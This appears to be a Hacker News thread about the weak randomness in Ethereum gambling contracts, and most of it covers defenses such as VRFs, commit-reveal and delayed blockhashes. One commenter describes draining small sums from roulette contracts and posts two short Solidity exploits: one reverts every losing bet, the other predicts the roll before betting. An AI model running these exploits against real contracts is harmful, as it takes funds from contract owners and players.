Predicting Random Numbers in Ethereum Smart Contracts (positive.com)
261 points by alexlash on Feb 2, 2018 | 60 comments



If this sort of thing interests you, check out Dfinity's random beacons: they use threshold cryptography (think of it as a type of "multisig") to solve the commit-reveal problem (where the last party to reveal their commitment can abandon the protocol, giving them an advantage).

They build on it to create a provable, deterministic source of randomness which can't be exploited in this same way.
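
To make the commit-reveal weakness concrete, here is a minimal, hypothetical sketch (Solidity 0.4-era syntax, names invented): whoever reveals last can compute the combined result off-chain before revealing, and simply walk away if they don't like it.

    pragma solidity ^0.4.24;

    contract CommitReveal {
        mapping(address => bytes32) public commitments;
        mapping(address => uint256) public reveals;
        address[] public players;

        // Phase 1: each player commits to keccak256(secret).
        function commit(bytes32 commitment) public {
            commitments[msg.sender] = commitment;
            players.push(msg.sender);
        }

        // Phase 2: players reveal their secrets. The last revealer already
        // knows everyone else's secret here, so they can compute result()
        // off-chain and simply never call reveal() if they dislike it.
        function reveal(uint256 secret) public {
            require(keccak256(abi.encodePacked(secret)) == commitments[msg.sender]);
            reveals[msg.sender] = secret;
        }

        // The "random" output: only meaningful once everyone has revealed.
        function result() public view returns (uint256 r) {
            for (uint256 i = 0; i < players.length; i++) {
                r ^= reveals[players[i]];
            }
        }
    }

Threshold schemes like the one described above avoid this because no single participant can withhold the final output on their own.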

Here's a video that goes into more detail: https://www.youtube.com/watch?v=xf1dql4Zoqw


There's a general class of cryptographic primitive for solving this problem called a VRF. Algorand also has a very clever way to solve the randomness problem, including a method to foil even an attacker who manages to get lucky repeatedly.


Did you mean Verifiable Random Functions (VRFs)?


I did, thanks


Is this class implemented in Solidity?


> deterministic source of randomness

There is a manifest contradiction here created by this choice of words.


IIRC it is entirely deterministic if all parties are in cahoots with each other and sharing their secrets. But if they are not, then it is effectively non-deterministic randomness.


A coin flip is deterministic if you know its initial conditions and environment with sufficient precision. Deterministic cryptographic primitives can similarly be viewed as random, from the perspective of an observer who doesn't know the relevant secrets.


> solve the commit-reveal problem (where the last party to reveal their commitment can abandon, so they have an advantage).

Don't you commit to the contract before any revelations are made?


Normally you have one user of the contract who invokes it, and somebody else mines/computes the results.

I think the trick here is that the user of the contract is also mining/computing the smart contract at the same time, and thus knows the contract's results before they're published to the network.

If they are unhappy with how the contract unfolds (because of the random component), they just pretend it all never happened, as if neither the contract invocation nor the mining/computing ever took place.


That is a really, really interesting post. I always figured that these were only exploitable from a miner's point of view, but no! Creating a contract that accesses the same randomness and THEN queries the targeted contract will work: since they both happen in the same block, the randomness will be the same.


Yeah, I used this trick to empty out a few tens of dollars' worth of Ethereum from a few naively-coded roulette contracts that were sitting around with a little money left in them.

Say a contract exists in the blockchain that owns a little bit of ether and has code so that if you send it a certain amount of money, it does some magic to randomly determine whether to send you more money back. I found a few contracts like that. All I had to do was code a contract that would send money to the target contract, check its own balance (to see if it won some money from the target), and then abort the entire transaction if its own balance isn't greater than it started with. The code was really simple: https://gist.github.com/AgentME/d4cc6aa355900853b8ede3a84b10...
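
Roughly, the idea sketched out (this is not the linked gist, just a minimal sketch with a hypothetical target interface, Solidity 0.4-era syntax, assuming the target pays out within the same call):

    pragma solidity ^0.4.24;

    // Hypothetical interface for a naive roulette that decides and pays out
    // within the same transaction as the bet.
    interface NaiveRoulette {
        function bet() external payable;
    }

    contract WinForcer {
        // Place a bet, then undo everything unless we came out ahead.
        function forceWin(address target) public payable {
            uint256 balanceBefore = address(this).balance; // already includes msg.value
            NaiveRoulette(target).bet.value(msg.value)();
            // Reverting here rolls back the bet itself, so only winning runs
            // are ever committed to the chain.
            require(address(this).balance > balanceBefore);
        }

        // Accept winnings sent back by the roulette.
        function () public payable {}

        // Pull accumulated winnings out (no access control in this sketch).
        function withdraw() public {
            msg.sender.transfer(address(this).balance);
        }
    }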

("Tens of dollars" was in present prices. I assume it was an even tinier amount of money when the creator or previous users put the money in. I think there's multiple interesting moral problems here: if you decide to ignore any "code is law" notions about Ethereum and call what I did as stealing, is the crime lessened by the fact that they thought it was worth even less when they put it into the contract? Also, who exactly did I steal from? The users who put the money into the contract believed they had gambled it away. Does it make a difference if they believed that money was going into an un-owned pot to be winnings for the next person? Do I count as a "winner", since I did claim it in a way it was coded to accept? ... Maybe a related problem: If someone doing some kind of art/performance statement purposefully hid money underground in a random place on public property unlocked, unmarked, and location unknown to themselves such that they thought no one else or even themselves could ever find it, and then I find it with x-ray goggles and take it, am I stealing?)


The questions of morality are largely orthogonal to the question of whether surrounding institutions have strategies to address behavior considered 'problematic'.

In the overworld, we have institutions which continuously interpret, enforce, refine, and revise both the letter and the spirit of contracts and law.

Ethereum developers and VIPs have already shown that they'll use hard forks to steer the community towards their preferred direction, and individuals will have to decide which chain to pursue. Since your actions are small beans and unlikely to prompt the Ethereum decision makers to reverse these transactions, you and others can likely keep doing such things in the future, and those affected will have little choice but to accept it.


OK, but their question was about morality, not about what will be enforced, so I'm not sure why you're bringing up enforcement.


I think they are interestingly intertwined questions. If something happens that's egregiously morally out of bounds, then people will find or create ways to enforce against it. From the other angle, existing enforcement mechanisms will impose themselves as trying to define what moral is. In a way, besides the little selfish gains, I may be fatalistically trying to define "code is law" as moral because it is what I am presently capable of enforcing. Maybe I'm just talking myself in a circle; it's good fuel to ruminate on.


> If something happens that's egregiously morally out of bounds, then people will find or create ways to enforce against it.

I think you left out "and a lot of money is involved". Do you think there would have been an emergency hard fork if the DAO only had $100 in it? I sincerely doubt it.

> existing enforcement mechanisms will impose themselves as trying to define what moral is.

Morality and Law (code or not) are different things. You can't code morality - you can only encode the programmer's morality. (Which is not the same thing, because the programmer can change his/her mind.)


I guess it would be more responsible to report the bug to the contract author first. Perhaps they will let you take it as a reward, and you'll sleep better at night and won't have a moral dilemma ;-)

Seriously though, nice find. What would be a way to defend against this?


The main article mentions some defenses. Never immediately determine whether or not the user wins; the basic idea of a transaction that results in a win or a loss within the same block has to be thrown out the door. Instead, roulette-type contracts must have the user pay in as one transaction, let the user check at a later block whether they won, and then let them withdraw any winnings in a separate transaction.

An easy and pretty good way to do this is to record the block number at which they make their deposit, and then have the question of whether they win or lose be calculated from the hash of the block some fixed N blocks after their deposit. There are certain attacks miners can attempt to force a win, but they require the miners to forfeit the mining rewards of any block they calculate where they lose, and unless N is small enough for an attacker to generate the whole chain of deposit-wait-then-withdraw blocks, or the entire network is working together, it's likely that a different miner will create a block first and interrupt any miner trying to bruteforce a winning block. So if the winnings are under the size of the block reward, there's basically zero danger, and the danger stays tiny unless the winnings are ridiculous. ... I hadn't thought about how possible future proof-of-stake schemes affect this, though. On second thought, those might be fatal to this strategy, since it might be easy for a staker to try out many block variations. I'm not too familiar with that detail of PoS schemes though.
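
A rough sketch of that deposit-then-resolve-against-a-future-blockhash pattern (hypothetical contract, Solidity 0.4-era syntax; odds, delay, and the handling of stale bets are all simplified):

    pragma solidity ^0.4.24;

    contract DelayedRoulette {
        uint256 constant DELAY = 10; // wait N blocks before resolving

        struct Bet {
            uint256 amount;
            uint256 placedAt; // block number of the deposit
        }
        mapping(address => Bet) public bets;

        // Transaction 1: deposit. Nothing about the outcome is decided here.
        function placeBet() public payable {
            require(bets[msg.sender].amount == 0);
            bets[msg.sender] = Bet(msg.value, block.number);
        }

        // Transaction 2, at least DELAY blocks later: resolve against the hash
        // of a block that did not exist when the bet was placed.
        function resolve() public {
            Bet memory bet = bets[msg.sender];
            require(bet.amount > 0);
            require(block.number > bet.placedAt + DELAY);
            delete bets[msg.sender]; // clear state before paying out

            bytes32 h = blockhash(bet.placedAt + DELAY);
            // blockhash() only covers the 256 most recent blocks; a real
            // contract needs a policy for bets resolved too late.
            require(h != bytes32(0));
            if (uint256(keccak256(abi.encodePacked(h, msg.sender))) % 2 == 0) {
                msg.sender.transfer(bet.amount * 2);
            }
        }
    }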

Another common solution involves active oracles and commit-then-reveal schemes, but they generally require the oracle to be honest, or else the oracle could participate in the lottery and force its own win. There are common ways that oracles try to show their own good behavior, so people can notice if they cheat and stop depending on them. As long as it's more profitable for the oracle to continue operating than to cheat a roulette and then be shunned, things work out.


Thanks for the explanation. Good point about staking: if the validator is chosen in advance, then they are certain to get the chance to order the transactions in their favour.

In the article, as I understood it, the caller predicts the outcome of the 'random' function first and then calls only if the result is favourable. It seems like yours is more efficient, as it relies on using revert() to undo all state changes if the outcome is unfavourable, so there's no need to predict anything!


I originally considered making my contract predict the outcome of the 'random' function first, but I got lazy when I realized I could just check whether I won and revert the transaction afterward for the specific contracts I wanted to attack. It also meant that my win-forcer contract was more generic and could work against more naive roulette contracts. However, my strategy would not work against naive roulette contracts that immediately on deposit calculate whether you won, but don't tell you or let you get the money until later. (I didn't encounter any like that, but it's a possible flawed way someone might attempt to make their contract defend against attacks.) To attack those, you would need to do the article's strategy of predicting the 'random' outcome first before making the deposit (or have your win-forcer contract automatically check the random outcome for you, and only make the deposit if it knows you'll win).
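
A sketch of that "predict first" variant (hypothetical: it assumes the target derives its roll from the previous block hash and the caller's address, the kind of flawed scheme the article describes; Solidity 0.4-era syntax):

    pragma solidity ^0.4.24;

    interface NaiveRoulette {
        function bet() external payable;
    }

    contract Predictor {
        function betOnlyIfWinning(address target) public payable {
            // Recompute the target's (assumed) formula before betting. From
            // the target's point of view, msg.sender is this contract, so we
            // use address(this) here.
            uint256 roll = uint256(keccak256(abi.encodePacked(
                blockhash(block.number - 1), address(this)))) % 2;
            require(roll == 0); // skip the bet entirely on a losing roll
            NaiveRoulette(target).bet.value(msg.value)();
        }

        // Accept winnings.
        function () public payable {}
    }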


It seems like commit-reveal is really the only thing that makes sense.


It's too bad it's not possible to store a secret in a contract (as far as I know). It would be interesting to store a private key that would be revealed only after a certain block number (let's say calculated to be 10 years in the future) as a sort of time capsule for files.


Considering that the entirety of the blockchain is public, it's impossible to actually put secrets into a smart contract. You have to make the data available to all nodes that actually run the smart contract.

An interesting approach to solving this is homomorphic encryption. This allows Alice to give Bob two encrypted numbers A and B. Bob can then compute an encrypted version of A + B using only the encrypted versions of A and B. This could be used by putting an encrypted secret on the blockchain, after which everyone can compute with that secret but cannot see its actual value.

This still won't help with random number generation though, because it remains deterministic.


I think proposals such as MAST allow contract branches to remain secret up until that part of the contract is executed (if it ever needs to be executed).

https://medium.com/novamining/mast-smart-contracts-on-bitcoi...


I don't see how HE helps, but I've heard of VRFs (verifiable random functions) and I think there's something that could be done with those.


The Dfinity team (https://dfinity.org) is using something like this to underlie their blockchain implementation: they use threshold BLS signatures with groups of nodes to sign previous chain states and still be resilient against misbehavior and network intermittence. The signatures are random, but their correctness can be verified once they have been published.

To support our secure key storage work, we'll be bringing a random beacon built on similar core concepts to the Ethereum chain for Keep.


We are working on this, in a sense, with Keep (https://keep.network). The actual storage is done off-chain, with an interaction on-chain, by incentivized nodes. The idea is to also support (initially limited) secure computation, like allowing a Keep to store a private key that can be used to cryptographically sign data via smart contract.

Revealing the key, for dead-man-switch-type operations for example, is also a possibility.


You can imagine how this would work trivially with lawyers (acting as executors/trustees, as they often do).

Take your secret key, split it into N pieces, create M parity pieces, RAID-style, for redundancy, distribute to M+N lawyers with instructions to reveal in 10 years. Lawyers put them into safe-deposit boxes for the duration, reveal in 10 years.

A mildly eccentric person could even do this at scale: create a public/private keypair for every year for the next, say, century, publish the public keys, distribute the private key pieces with instructions to a wide range of lawyers. Members of the public can encrypt and publish data with the appropriate public key, assuming they trust the system.


Shamir's Secret Sharing (SSS)[1] is a technique for doing this.

SSS solves a harder problem than (my understanding of) RAID parity: it requires not just k out of i pieces (your N and M+N) to assemble the secret, but also guarantees that fewer than k pieces are never sufficient, for arbitrary 0 < k < i.

These days, SSS is commonly recommended (I don't know whether it's also commonly used) for storing cryptocurrency wallet backups.

[1]: https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing


You could with an oracle. Without an oracle I think this would be impossible. How will the chain know the key in 10 years but not Bob now?


Time-locks (https://www.gwern.net/Self-decrypting-files): you can implement them trapdoor/proof-of-work style using squaring or hashing with a reward that can be claimed only by publicly revealing the secret. Eventually you will be able to use witness encryption so you can encrypt a secret to the property 'Bitcoin blockchain has reached 500 additional blocks' which can only be decrypted by providing the valid PoW-hashes of 500 blocks etc.


> Eventually you will be able to use witness encryption so you can encrypt a secret to the property 'Bitcoin blockchain has reached 500 additional blocks' which can only be decrypted by providing the valid PoW-hashes of 500 blocks etc.

How do you prevent abusing that by running it in a simulation in which the difficulty crashes?


Bitcoin's difficulty adjusts only every 2016 blocks (roughly two weeks), so tanking the difficulty still requires the investment of a vast amount of hash power in order to create a parallel chain.

Secondly, as I understand witness encryption, if you're able to encode the hash rules as the condition, it would be easy to throw in an additional condition like 'all hash difficulties (# of leading zeros) must be >= difficulty XYZ' and simply ban large difficulty reductions. That works as long as Bitcoin remains popular enough to justify high-difficulty blocks; and if it crashes, your timelock is no longer secure anyway, so you'd rather it fail safe and never open.


Would this still be possible if the consensus algorithm was changed to proof of stake?


I'm not sure. Maybe you could change the condition to 'n successive stake signatures' but you would also have to model the stake-selection procedure in it... A property over a hash is fairly simple, but rerunning the whole PoS, essentially, is probably going to blow the witness encryption out into astronomical sizes unless someone can think of clever tricks?


What's the point of using the network then?

Why not do everything more efficiently via the "oracle" server?


This is the question that applies to about 99% of Dapps so far (at least the ones that don't simply exist to serve other Dapps).


Yes, exactly -- how does having some sort of external intervention into the protocol make the protocol more robust?


You misunderstand.

If a smart contract relies on an external data source from a normal server (oracle), then why even take the risk of deploying the smart contract?

If you're using an oracle for a data source you might as well do everything on a normal database.


By minimizing the role of the oracle, instead of relying on one entity you can rely on the market. Anybody could be the oracle; they'd put their reputation/offer/price on the market and the stakeholders would select one as they wish.

You're still trusting the selected oracle to behave honestly, but they will be operating in a very competitive market which hopefully would lead to better behaviour. They might cheat once, but it would be trivial to switch to a better oracle next time.



You might be able to do this by having an Oracle as the intermediary - e.g. you write an Oracle that will reveal a private key at a certain point in the future, and the smart contract will be "activated" by the Oracle response. Problem is, where do you run an Oracle reliably?


The only solution I can think of is evolving contracts that rewrite themselves along the blockchain as they evolve, the most recent write being the ~state of the "secret". Each evolving contract could, composing a variety of hashing functions, write frequently enough to the blockchain that it would be impossible to predict where it was going, yet still be verifiable along the way, historically. Call it an evolving hash function.


You couldn't do that and have it evolve towards a predetermined value though (unless you make it predictable in a way that any viewer could also predict it).


Yes you can: you have a hash that is not public, and only segments are revealed and verified along the chain. Revealing the whole secret would mean it's no longer secret.


How would that work? Everything in the blockchain is public. You can't automatically have something be revealed in the blockchain; if that worked, what would stop someone from simulating blocks being added to the blockchain and seeing what your contract does? Unless the decryption was somehow linked to the set of proofs-of-work involved, but I don't think anyone yet has an idea of how that could be done.

You could later publish a decryption key into the blockchain that the contract uses, but I don't think that's "automatic" in the sense the earlier posts were hoping for.


Right, you would need a secret that is never revealed on the blockchain itself, but you could verify that someone had it and posted hashes derived from it periodically on the blockchain.
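
One hypothetical way to do that is a hash chain (sketch, Solidity 0.4-era syntax): the holder precomputes h_k = keccak256(h_{k-1}) off-chain starting from the original secret, publishes only the tip h_k, and then periodically proves continued possession by revealing the next preimage, without the underlying secret ever appearing on-chain.

    pragma solidity ^0.4.24;

    contract HashChainBeacon {
        bytes32 public tip;

        constructor(bytes32 initialTip) public {
            tip = initialTip;
        }

        // Each accepted preimage becomes the new tip, proving that whoever
        // produced it has released the next link of the chain.
        function reveal(bytes32 preimage) public {
            require(keccak256(abi.encodePacked(preimage)) == tip);
            tip = preimage;
        }
    }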


Some sort of scheme using Shamir's Secret Sharing with a set of oracles could work, as long as it's not possible for the oracles to easily discover each other and collude to decrypt the secret on their own.


White-box cryptography. AFAIK, all attempted implementations got broken, but it's still an active research area.


There are no provably secure white-box crypto implementations. It's actually debated within the community _whether_ one can even exist.


Isn't Elasticsearch an extreme overkill for 3500 contracts?


Almost definitely, but it's probably the only real option to feed data to a rich filtering / display UI like Kibana, for easier exploration. Probably worth the effort if you know how to do it.


Well, let's ignore the reuse of seeds and focus on generating random numbers in a range 0..N using a uniform random generator that gives numbers in 0..M, where M >= N.

The code snippets shown use a modulus (x % (N+1)) to accomplish that. This results in numbers that are not uniformly distributed unless (M+1) is a multiple of (N+1).

Of course, the differences in probability aren't that huge but the contracts are mathematically not fair.

    import numpy as np
    n, m = 2, 20
    # 20 million uniform draws from 0..m-1, reduced mod (n+1)
    binc = np.bincount(np.random.randint(0, m, size=20000000) % (n + 1))
    print(1.0 * binc / sum(binc))
    # output: [0.3501464 0.3497516 0.300102 ]
When we're generating 0-2 from uniform draws in 0-19, we get 0 and 1 more often than 2.
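
A common fix is rejection sampling instead of a bare modulus; here's a hypothetical Solidity sketch (names made up), where draws landing in the generator's uneven "tail" are rejected so the accepted ones map uniformly onto 0..n-1:

    pragma solidity ^0.4.24;

    library Unbiased {
        // Reduce a uniform uint256 draw to 0..n-1 without modulo bias.
        // Reverts if the draw falls in the tail; the caller must then obtain
        // a fresh draw and try again.
        function unbiasedMod(uint256 draw, uint256 n) internal pure returns (uint256) {
            require(n > 0);
            // Largest multiple of n below 2^256: draws at or above it would
            // give the low residues one extra chance each.
            uint256 limit = ~uint256(0) - (~uint256(0) % n);
            require(draw < limit);
            return draw % n;
        }
    }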


Relevant thread wrt rng in smartcontracts: https://news.ycombinator.com/item?id=16281347


What use cases are there for random numbers in smart contracts? From the article, it seems like gambling is the main use.


Suppose I wanted to create a "game" running on Ethereum's global computer, perhaps one that allowed people to own and breed virtual cats. I might want a random component in my "breed" behavior.

Imagine I want to create a smart contract where tasks are created by customers and assigned randomly to "turks" who submit completed tasks and are paid (if the task is accepted). A random number might be one useful part of the task assignment process.

ANY program that would use random numbers is a potential candidate.


It's pretty much the same use cases as for any standard code; smart contracts are just decentralised code, after all.


Gambling is pretty much the only use for smart contracts in general.


Supposedly, this is a 51.96 billion market globally.

https://www.statista.com/statistics/270728/market-volume-of-online-gaming-worldwide/


Maybe by people coming into the industry. The established industry in general is far too risk-averse to use smart contracts in their current state.



